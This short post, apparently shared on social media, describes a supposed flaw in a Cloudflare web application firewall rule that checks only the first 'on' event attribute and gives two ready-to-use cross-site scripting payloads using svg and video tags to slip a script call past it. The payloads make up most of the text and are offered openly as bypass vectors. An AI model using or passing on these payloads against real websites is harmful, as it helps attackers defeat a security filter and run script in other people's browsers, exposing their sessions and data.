Cloudflare XSS Bypass
It appears there is a regex that only checks for the first occurrence of “on” followed by a word (e.g. /on\w+/m)
This allows multiple bypass vectors
Examples:
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
#WAF #Bypass